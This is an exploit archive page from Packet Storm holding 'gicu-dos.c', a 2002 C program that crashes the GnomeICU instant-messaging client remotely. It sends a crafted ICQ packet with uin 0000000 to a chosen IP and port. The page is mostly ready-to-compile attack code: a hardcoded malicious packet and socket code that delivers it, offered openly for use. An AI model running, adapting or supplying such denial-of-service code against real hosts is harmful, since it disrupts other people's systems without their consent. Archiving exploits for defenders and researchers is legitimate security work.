what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

gicu-dos.c

gicu-dos.c
Posted Jan 25, 2002
Authored by Christian Milow

GnomeICU v0.96.1 remote dos exploit. Sends a message with uin=0000000 causing a seg fault. Tested on GnomeICU 0.95->0.96.1 on RH 7.0, Slackware 8.0.

tags | exploit, remote, denial of service
systems | linux, slackware
SHA-256 | 6c7a971a62cffc000b5fbfe560a6c6266cee3054efb33e5fa8c904d551d9a46d

gicu-dos.c

Change Mirror Download
  
/* gnome.icu.crash - by insulted

oh god, this is so lame again... i found out this lil dos
on gnome icu wile i was coding a small icq app...This is
fairly simple bug, when a msg with uin 0000000 is sent,
the gnome icu client can't handle it and the applet simply
seg fault.

tested on GnomeICU 0.95->0.96.1 on RH 7.0, Slackware 8.0

mail: christian.milow@mail.be
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <unistd.h>
#include <arpa/inet.h>


char icqmsg[]={"\x00\x00\x89\x11\x08\x04\x03\x00\xEE\x07
\x00\x00\x70\x8C\x08\x04\x01\x00\x04\x00
\x00\x00\x00\x00\xD4\x44\xDC\xEF\xD4\x44
\xDC\xEF\xA0\x0F\x00\x00\x04\x00\x00\x10
\x00\xF6\xFF\xFF\xFF"};

int main(int argc, char *argv[])
{
int sock;
struct sockaddr_in slut;

if(argc<3)
{
printf("usage: %s <ip> <port>\n",argv[0]);
printf(" default port on gicu is 4000\n");
return -1;
}

/* once upon a sock ... */

if((sock = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0)
{
perror("socket");
return -1;
}

slut.sin_family = AF_INET;
slut.sin_port = htons(atoi(argv[2]));
slut.sin_addr.s_addr=inet_addr(argv[1]);

if(connect(sock,(struct sockaddr *)&slut,sizeof(struct sockaddr))<0)
{
perror("connect");
return -1;
}

if(send(sock,&icqmsg,sizeof(icqmsg),0)<0)
{
perror("send");
return -1;
}

/* she lived happily ever after ... */

close(sock);

/* END - so quick, so done */

return 0;
}

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    16 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close